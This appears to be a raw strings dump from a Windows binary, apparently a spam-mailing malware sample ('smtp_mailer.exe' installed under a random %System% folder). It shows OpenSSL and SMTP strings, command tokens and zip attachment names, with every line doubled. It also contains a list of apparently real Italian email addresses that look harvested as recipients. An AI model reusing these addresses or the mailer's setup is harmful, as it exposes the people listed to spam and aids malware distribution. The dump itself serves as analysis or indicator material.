.\crypto\evp\evp_key.c
.\crypto\evp\evp_key.c
nkey
nkey
%'%1$=%C%K%O%s%
%'%1$=%C%K%O%s%
.%.-.3.7.9.?.W.[.o.y.
.%.-.3.7.9.?.W.[.o.y.
C%C'C3C7C9COCWCiC
C%C'C3C7C9COCWCiC
d:\libraries\openssl-0.9.8l\crypto\ec\ec2_smpt.c
d:\libraries\openssl-0.9.8l\crypto\ec\ec2_smpt.c
%d.%d.%d.%d/%d.%d.%d.%d
%d.%d.%d.%d/%d.%d.%d.%d
%*s%s:
%*s%s:
%*sPolicy Text: %s
%*sPolicy Text: %s
%*scrlUrl:
%*scrlUrl:
EXTENDED_KEY_USAGE
EXTENDED_KEY_USAGE
%*sZone: %s, User:
%*sZone: %s, User:
certificateHold
certificateHold
Certificate Hold
Certificate Hold
cessationOfOperation
cessationOfOperation
Cessation Of Operation
Cessation Of Operation
keyCompromise
keyCompromise
Key Compromise
Key Compromise
name.relativename
name.relativename
name.fullname
name.fullname
.\crypto\x509v3\v3_akey.c
.\crypto\x509v3\v3_akey.c
PKEY_USAGE_PERIOD
PKEY_USAGE_PERIOD
keyCertSign
keyCertSign
Certificate Sign
Certificate Sign
keyAgreement
keyAgreement
Key Agreement
Key Agreement
keyEncipherment
keyEncipherment
Key Encipherment
Key Encipherment
.\crypto\x509v3\v3_skey.c
.\crypto\x509v3\v3_skey.c
.\crypto\asn1\x_pkey.c
.\crypto\asn1\x_pkey.c
\X
\X
CONF part of OpenSSL 0.9.8l 5 Nov 2009
CONF part of OpenSSL 0.9.8l 5 Nov 2009
%s - d:d:d %d%s
%s - d:d:d %d%s
- %-15s
- %-15s
'() ,-./:=?
'() ,-./:=?
error:lX:%s:%s:%s
error:lX:%s:%s:%s
%lu:%s:%s:%d:%s
%lu:%s:%s:%d:%s
Verifying - %s
Verifying - %s
CONF_def part of OpenSSL 0.9.8l 5 Nov 2009
CONF_def part of OpenSSL 0.9.8l 5 Nov 2009
[[%s]]
[[%s]]
[%s] %s=%s
[%s] %s=%s
%s.dll
%s.dll
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Operation not permitted
Operation not permitted
Inappropriate I/O control operation
Inappropriate I/O control operation
Broken pipe
Broken pipe
MAIL FROM:
MAIL FROM:
RCPT TO:
RCPT TO:
--%s--
--%s--
LOGIN
LOGIN
AUTH LOGIN
AUTH LOGIN
%s^%s^%s
%s^%s^%s
AUTH PLAIN %s
AUTH PLAIN %s
smtp/
smtp/
charset=utf-8,username="%s"
charset=utf-8,username="%s"
,realm="%s"
,realm="%s"
,nonce="%s"
,nonce="%s"
,nc=%s
,nc=%s
,cnonce="%s"
,cnonce="%s"
,digest-uri="%s"
,digest-uri="%s"
,response=%s
,response=%s
,qop=%s
,qop=%s
----=_NextPart_000_000%d_%X.%X
----=_NextPart_000_000%d_%X.%X
Date: %s, %d %s %d %d:%d:%d
Date: %s, %d %s %d %d:%d:%d
EHLO %s
EHLO %s
PHACMD_ABORT_
PHACMD_ABORT_
undefined.zip
undefined.zip
PHACMD_SKIP__ERROR
PHACMD_SKIP__ERROR
PHACMD_MESSAGE_SENT
PHACMD_MESSAGE_SENT
PHACMD_ACCOUNT_STRING
PHACMD_ACCOUNT_STRING
INVALID_SMTP
INVALID_SMTP
PHACMD_PACKAGE_STRING
PHACMD_PACKAGE_STRING
PHACMD_FROM_NAME
PHACMD_FROM_NAME
Z:\@proj\smtp_mailer\Release\smtp_mailer.pdb
Z:\@proj\smtp_mailer\Release\smtp_mailer.pdb
KERNEL32.dll
KERNEL32.dll
WS2_32.dll
WS2_32.dll
GetCPInfo
GetCPInfo
GetProcessHeap
GetProcessHeap
USER32.dll
USER32.dll
ReportEventA
ReportEventA
ADVAPI32.dll
ADVAPI32.dll
PeekNamedPipe
PeekNamedPipe
zcÃ
zcÃ
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
.?AVCSmtp@@
.?AVCSmtp@@
.?AVECSmtp@@
.?AVECSmtp@@
%System%\nkpkpudssleie\smtp\smtp_mailer.exe
%System%\nkpkpudssleie\smtp\smtp_mailer.exe
Inappropriate I/O control opera
Inappropriate I/O control opera
marini.m2@libero.it
marini.m2@libero.it
%System%\nkpkpudssleie\smtp\tmp\sbgtca.txt
%System%\nkpkpudssleie\smtp\tmp\sbgtca.txt
%System%\nkpkpudssleie\smtp\tmp\24andrewson.zip
%System%\nkpkpudssleie\smtp\tmp\24andrewson.zip
mario.gilardi@infap.it,mario.lapini@turishav.it,mario.tintori@universalturismo.com,mario@gardareisen.it,mariobochicchio@virgilio.it,mariocrivaroonlus@virgilio.it,mariocrocetti@libero.it,mariodesideri@icloud.com,marionurossi@libero.it
mario.gilardi@infap.it,mario.lapini@turishav.it,mario.tintori@universalturismo.com,mario@gardareisen.it,mariobochicchio@virgilio.it,mariocrivaroonlus@virgilio.it,mariocrocetti@libero.it,mariodesideri@icloud.com,marionurossi@libero.it
pratesi.com
pratesi.com
s.com
s.com
6 6$6(6,60646~7
6 6$6(6,60646~7
3 3$3(3,3034383
3 3$3(3,3034383
;&;,;
;&;,;
9(:-:4:::
9(:-:4:::
7t7U7\7
7t7U7\7
4E4F4`4r4
4E4F4`4r4
> >(>0>8>
> >(>0>8>
6$6(6\6`6
6$6(6\6`6
; ;$;0;4;8;|;
; ;$;0;4;8;|;
3 3@3`3|3
3 3@3`3|3
Fmscoree.dll
Fmscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
portuguese-brazilian
portuguese-brazilian